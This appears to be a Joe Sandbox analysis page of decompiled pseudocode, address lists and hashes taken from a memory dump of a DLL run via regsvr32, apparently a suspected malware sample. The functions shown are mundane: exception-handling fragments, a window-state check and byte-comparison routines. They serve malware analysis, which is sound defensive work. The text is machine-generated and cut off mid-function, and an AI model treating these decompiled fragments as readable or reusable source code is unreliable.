								 *((intOrPtr*)(_t225 - 0x10)) = 1;
								L106:
								_t160 =  *((intOrPtr*)(_t225 + 0x14));
								if(_t160 != 0) {
									 *_t160 =  *((intOrPtr*)(_t225 - 0x10));
								}
								 *(_t225 - 4) =  *(_t225 - 4) | 0xffffffff;
								L100128B8(_t225 - 0x14);
								_t163 = 1;
								L40:
								return E10047725(_t163);
							}
							goto L12;
						}
					}
					_t217 =  *(_t225 + 0x10);
					__eflags =  *_t217;
					if( *_t217 == 0) {
						goto L39;
					}
					_push(_t225 - 0x10);
					_push(_t217);
					_push( *((intOrPtr*)(_t225 + 0xc)));
					_t185 =  *((intOrPtr*)( *__ecx + 0xec))();
					goto L6;
				}
				_push( *(_t225 + 0x10));
				_push( *((intOrPtr*)(_t225 + 0xc)));
				if( *((intOrPtr*)( *__ecx + 0xe8))() == 0) {
					goto L39;
				}
				goto L2;
			}

0x1001643c
0x1001643c
0x10016443
0x10016448
0x1001644c
0x1001644f
0x10016456
0x1001645f
0x10016462
0x10016486
0x10016489
0x100164b5
0x100164b8
0x100164bb
0x100164c8
0x100164c8
0x100164cd
0x100164d0
0x100164e6
0x100164e6
0x100164e9
0x100164eb
0x1001653a
0x1001653e
0x1001654b
0x10016554
0x1001655f
0x10016565
0x10016567
0x1001656a
0x1001659a
0x1001659a
0x1001659d
0x100165a3
0x100165a5
0x10016634
0x10016634
0x10016637
0x00000000
0x00000000
0x100165ad
0x100165b4
0x100165b6
0x100165b8
0x100165fc
0x10016601
0x1001661f
0x10016624
0x10016626
0x10016628
0x00000000
0x00000000
0x1001660a
0x1001660c
0x1001691d
0x10016920
0x10016925
0x10016925
0x10016928
0x10016928
0x10016929
0x1001692c
0x1001692e
0x10016930
0x10016930
0x00000000
0x10016930
0x10016612
0x10016614
0x10016616
0x1001661b
0x1001661b
0x1001661e
0x1001661e
0x1001662a
0x1001662d
0x1001662f
0x10016631
0x00000000
0x10016631
0x100165ba
0x100165bd
0x100165c0
0x100165c5
0x100165c7
0x100165ca
0x00000000
0x00000000
0x100165cf
0x100165d5
0x100165da
0x100165e3
0x100165e6
0x100165e9
0x00000000
0x00000000
0x100165ef
0x00000000
0x10016672
0x1001667a
0x00000000
0x00000000
0x10016684
0x00000000
0x00000000
0x1001669e
0x100166a0
0x100166a0
0x100166a3
0x100166a4
0x100166a7
0x100166ab
0x00000000
0x00000000
0x100166ba
0x100166be
0x00000000
0x00000000
0x100166c5
0x1001667b
0x1001667b
0x1001667d
0x00000000
0x00000000
0x100166c8
0x100166d0
0x100166d3
0x100166d6
0x100166da
0x100166dd
0x100166e2
0x100166e4
0x100166e8
0x100166ec
0x100166ef
0x100166f4
0x100166f6
0x100166f8
0x100166fb
0x100166fd
0x10016702
0x10016705
0x1001670a
0x1001670c
0x1001670e
0x1001670e
0x1001670c
0x10016711
0x10016711
0x10016714
0x10016715
0x10016716
0x10016719
0x1001671a
0x1001671c
0x1001671e
0x10016722
0x10016726
0x10016729
0x1001672c
0x10016730
0x00000000
0x00000000
0x10016737
0x1001673f
0x10016742
0x10016745
0x10016748
0x1001674b
0x1001674c
0x1001674e
0x10016752
0x10016754
0x10016754
0x10016754
0x10016758
0x1001675b
0x1001675b
0x1001675e
0x10016762
0x00000000
0x00000000
0x1001676c
0x1001676f
0x1001676f
0x10016772
0x10016774
0x00000000
0x00000000
0x10016786
0x10016789
0x1001678a
0x00000000
0x00000000
0x00000000
0x00000000
0x10016793
0x10016799
0x1001679a
0x1001679d
0x10016779
0x10016779
0x1001677a
0x100166b0
0x100166b0
0x100166b1
0x100166b3
0x00000000
0x00000000
0x100168a0
0x00000000
0x00000000
0x100167ab
0x00000000
0x00000000
0x100167a2
0x100167a4
0x00000000
0x00000000
0x100167b6
0x100167b9
0x100167ba
0x00000000
0x00000000
0x100167c5
0x100167c8
0x100167cb
0x100167cc
0x00000000
0x00000000
0x100167d9
0x100167da
0x00000000
0x00000000
0x10016698
0x100168a1
0x100168a1
0x00000000
0x00000000
0x10016689
0x1001668b
0x00000000
0x00000000
0x100167ea
0x100167f1
0x100167f2
0x100167f4
0x100167f7
0x00000000
0x00000000
0x100167ff
0x10016802
0x00000000
0x00000000
0x10016809
0x1001680c
0x00000000
0x00000000
0x10016815
0x10016818
0x1001681b
0x1001681c
0x1001681f
0x10016820
0x10016823
0x00000000
0x00000000
0x1001682d
0x00000000
0x00000000
0x10016832
0x10016833
0x10016833
0x10016838
0x10016838
0x00000000
0x00000000
0x10016840
0x10016841
0x00000000
0x00000000
0x10016846
0x10016849
0x1001684c
0x1001684f
0x10016850
0x10016850
0x10016854
0x00000000
0x00000000
0x1001685b
0x1001685f
0x10016864
0x10016864
0x00000000
0x00000000
0x1001686a
0x1001686d
0x1001686f
0x00000000
0x00000000
0x10016876
0x10016879
0x1001687c
0x1001687f
0x10016882
0x10016885
0x10016888
0x1001688b
0x1001689c
0x1001689d
0x100168a4
0x100168a4
0x100168a6
0x00000000
0x100168a6
0x10016893
0x10016894
0x10016897
0x00000000
0x00000000
0x100168ad
0x100168ae
0x100168ae
0x100168b0
0x00000000
0x00000000
0x100168d7
0x100168d8
0x100168db
0x100168dd
0x00000000
0x00000000
0x10016662
0x10016665
0x10016668
0x1001666b
0x1001666c
0x1001666c
0x00000000
0x00000000
0x100168b4
0x100168b7
0x100168b8
0x100168b8
0x100168bb
0x100168bb
0x100168bc
0x100168c0
0x100168c0
0x00000000
0x00000000
0x100168c3
0x100168c6
0x100168c9
0x100168cc
0x100168cd
0x100168cd
0x100168ce
0x100168d1
0x100168d1
0x100168d3
0x00000000
0x00000000
0x100168e4
0x100168e7
0x100168ea
0x100168ed
0x100168ee
0x100168f2
0x100168f5
0x100168f6
0x100168fa
0x100168fb
0x100168fd
0x100168ff
0x100164a8
0x100164a8
0x100164aa
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10016907
0x10016909
0x1001690b
0x1001690d
0x10016910
0x00000000
0x00000000
0x1001664c
0x1001664c
0x10016653
0x10016658
0x10016658
0x00000000
0x00000000
0x100165ef
0x1001663d
0x10016640
0x10016640
0x10016640
0x10016647
0x00000000
0x10016647
0x1001656f
0x10016571
0x10016574
0x00000000
0x00000000
0x10016576
0x1001657c
0x1001657f
0x10016584
0x10016586
0x00000000
0x00000000
0x1001658c
0x10016593
0x00000000
0x00000000
0x00000000
0x10016595
0x100164ed
0x100164f1
0x00000000
0x00000000
0x100164f3
0x100164f9
0x10016503
0x10016503
0x10016509
0x10016513
0x10016519
0x1001651c
0x00000000
0x00000000
0x1001651e
0x1001652c
0x10016532
0x10016534
0x00000000
0x00000000
0x00000000
0x10016534
0x1001650b
0x10016511
0x00000000
0x00000000
0x00000000
0x10016511
0x100164fb
0x10016501
0x00000000
0x00000000
0x00000000
0x100164d2
0x100164dd
0x100164e2
0x100164e4
0x1001647a
0x1001647a
0x10016933
0x10016933
0x10016938
0x1001693d
0x1001693d
0x1001693f
0x10016946
0x1001694d
0x1001665a
0x1001665f
0x1001665f
0x00000000
0x100164e4
0x100164d0
0x1001648b
0x1001648e
0x10016490
0x00000000
0x00000000
0x1001649b
0x1001649c
0x1001649d
0x100164a2
0x00000000
0x100164a2
0x10016464
0x10016469
0x10016474
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10016443

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 34f6f1689c6f1fe59412e6c3379c9def9c694dafd6070cd8b35c4354a0752127
Instruction ID: 6f60986b119c3be40768c945038ae1be506edf061b984a87b6ee2efb94c889f8
Opcode Fuzzy Hash: 34f6f1689c6f1fe59412e6c3379c9def9c694dafd6070cd8b35c4354a0752127
Instruction Fuzzy Hash: 30F15A74A0025AEFDF14DF64CC90AAE7BA9FF08354F118129F815AF291DB35E981DB60

Uniqueness

Uniqueness Score: -1.00%

Function 100014C4 Relevance: 1.5, APIs: 1, Instructions: 4
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100014C4(void* __ecx) {

				return IsIconic( *(__ecx + 0x20));
			}

0x100031a2

APIs

IsIconic.USER32(?), ref: 1000319C

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: a6075f7090f9a60b8c602da68f33975638b429c5d6b1f9f169a5d4623d5fa5c8
Instruction ID: df37bff47b6fd1b3b5054d138b8d70c21f5bc54fc6c337dd5c71f3a3c6f14c23
Opcode Fuzzy Hash: a6075f7090f9a60b8c602da68f33975638b429c5d6b1f9f169a5d4623d5fa5c8
Instruction Fuzzy Hash: D2A002B54101209BEE12DF10CE5C5C93B35FB4938633441D9E4895D035C7228422EA40

Uniqueness

Uniqueness Score: -1.00%

Function 1004B88A Relevance: .4, Instructions: 384
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1004B88A(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
					if(__esi == 0) {
						L10:
						__esi =  *(__eax - 0x1e) & 0x000000ff;
						__edx =  *(__ecx - 0x1e) & 0x000000ff;
						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
						if(__esi == 0) {
							L12:
							__esi =  *(__eax - 0x1d) & 0x000000ff;
							__edx =  *(__ecx - 0x1d) & 0x000000ff;
							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
							if(__esi == 0) {
								L14:
								__esi =  *(__eax - 0x1c) & 0x000000ff;
								__edx =  *(__ecx - 0x1c) & 0x000000ff;
								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L17;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L14;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L12;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L10;
				}
				L1:
				_t197 = _t316;
				goto L2;
			}

0x1004b88a
0x1004b88a
0x1004b890
0x1004b910
0x1004b912
0x1004b914
0x00000000
0x00000000
0x1004b91a
0x1004b920
0x1004b99f
0x1004b9a1
0x1004b9a3
0x00000000
0x00000000
0x1004b9a9
0x1004b9af
0x1004ba2e
0x1004ba30
0x1004ba32
0x00000000
0x00000000
0x1004ba38
0x1004ba3e
0x1004babd
0x1004babf
0x1004bac1
0x00000000
0x00000000
0x1004bacd
0x1004bb4d
0x1004bb4f
0x1004bb51
0x00000000
0x00000000
0x1004bb57
0x1004bb5d
0x1004bbdc
0x1004bbde
0x1004bbe0
0x00000000
0x00000000
0x1004bbe6
0x1004bbec
0x1004bc6b
0x1004bc6d
0x1004bc6f
0x00000000
0x00000000
0x1004bc7d
0x1004bc7f
0x1004b862
0x1004b86a
0x1004b86c
0x1004b448
0x1004b450
0x1004b452
0x1004b463
0x1004b463
0x1004b058
0x1004bdb4
0x1004bdb4
0x1004b879
0x1004b87f
0x1004bc98
0x1004bc98
0x00000000
0x1004b885
0x00000000
0x1004b885
0x1004b87f
0x1004bc8c
0x1004bc92
0x00000000
0x00000000
0x00000000
0x1004bc92
0x1004bbf5
0x1004bbf7
0x1004bc0e
0x1004bc16
0x1004bc18
0x1004bc2f
0x1004bc37
0x1004bc39
0x1004bc50
0x1004bc58
0x1004bc5a
0x1004bc67
0x1004bc67
0x00000000
0x1004bc5a
0x1004bc46
0x1004bc4a
0x00000000
0x00000000
0x00000000
0x1004bc4a
0x1004bc25
0x1004bc29
0x00000000
0x00000000
0x00000000
0x1004bc29
0x1004bc04
0x1004bc08
0x00000000
0x00000000
0x00000000
0x1004bc08
0x1004bb66
0x1004bb68
0x1004bb7f
0x1004bb87
0x1004bb89
0x1004bba0
0x1004bba8
0x1004bbaa
0x1004bbc1
0x1004bbc9
0x1004bbcb
0x1004bbd8
0x1004bbd8
0x00000000
0x1004bbcb
0x1004bbb7
0x1004bbbb
0x00000000
0x00000000
0x00000000
0x1004bbbb
0x1004bb96
0x1004bb9a
0x00000000
0x00000000
0x00000000
0x1004bb9a
0x1004bb75
0x1004bb79
0x00000000
0x00000000
0x00000000
0x1004bb79
0x1004bad7
0x1004bad9
0x1004baf0
0x1004baf8
0x1004bafa
0x1004bb11
0x1004bb19
0x1004bb1b
0x1004bb32
0x1004bb3a
0x1004bb3c
0x1004bb49
0x1004bb49
0x00000000
0x1004bb3c
0x1004bb28
0x1004bb2c
0x00000000
0x00000000
0x00000000
0x1004bb2c
0x1004bb07
0x1004bb0b
0x00000000
0x00000000
0x00000000
0x1004bb0b
0x1004bae6
0x1004baea
0x00000000
0x00000000
0x00000000
0x1004baea
0x1004ba47
0x1004ba49
0x1004ba60
0x1004ba68
0x1004ba6a
0x1004ba81
0x1004ba89
0x1004ba8b
0x1004baa2
0x1004baaa
0x1004baac
0x1004bab9
0x1004bab9
0x00000000
0x1004baac
0x1004ba98
0x1004ba9c
0x00000000
0x00000000
0x00000000
0x1004ba9c
0x1004ba77
0x1004ba7b
0x00000000
0x00000000
0x00000000
0x1004ba7b
0x1004ba56
0x1004ba5a
0x00000000
0x00000000
0x00000000
0x1004ba5a
0x1004b9b8
0x1004b9ba
0x1004b9d1
0x1004b9d9
0x1004b9db
0x1004b9f2
0x1004b9fa
0x1004b9fc
0x1004ba13
0x1004ba1b
0x1004ba1d
0x1004ba2a
0x1004ba2a
0x00000000
0x1004ba1d
0x1004ba09
0x1004ba0d
0x00000000
0x00000000
0x00000000
0x1004ba0d
0x1004b9e8
0x1004b9ec
0x00000000
0x00000000
0x00000000
0x1004b9ec
0x1004b9c7
0x1004b9cb
0x00000000
0x00000000
0x00000000
0x1004b9cb
0x1004b929
0x1004b92b
0x1004b942
0x1004b94a
0x1004b94c
0x1004b963
0x1004b96b
0x1004b96d
0x1004b984
0x1004b98c
0x1004b98e
0x1004b99b
0x1004b99b
0x00000000
0x1004b98e
0x1004b97a
0x1004b97e
0x00000000
0x00000000
0x00000000
0x1004b97e
0x1004b959
0x1004b95d
0x00000000
0x00000000
0x00000000
0x1004b95d
0x1004b938
0x1004b93c
0x00000000
0x00000000
0x00000000
0x1004b892
0x1004b892
0x1004b896
0x1004b89a
0x1004b89c
0x1004b8b3
0x1004b8b3
0x1004b8b7
0x1004b8bb
0x1004b8bd
0x1004b8d4
0x1004b8d4
0x1004b8d8
0x1004b8dc
0x1004b8de
0x1004b8f5
0x1004b8f5
0x1004b8f9
0x1004b8fd
0x1004b8ff
0x1004b905
0x1004b908
0x1004b90c
0x1004b90c
0x00000000
0x1004b8ff
0x1004b8e4
0x1004b8e7
0x1004b8eb
0x1004b8ef
0x00000000
0x00000000
0x00000000
0x1004b8ef
0x1004b8c3
0x1004b8c6
0x1004b8ca
0x1004b8ce
0x00000000
0x00000000
0x00000000
0x1004b8ce
0x1004b8a2
0x1004b8a5
0x1004b8a9
0x1004b8ad
0x00000000
0x00000000
0x00000000
0x1004b8ad
0x1004ac83
0x1004ac83
0x00000000

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: 7b5a7c5434aea4c44cb1393324e9d8359c5f3d1551e4eab25712ed6b60d88d4d
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 30D16F73C0EDF30683B5C12D409822EEBA2AFC159132BC3F59CD47F389966A5D5496D4

Uniqueness

Uniqueness Score: -1.00%

Function 1004B46A Relevance: .4, Instructions: 378
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1004B46A(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
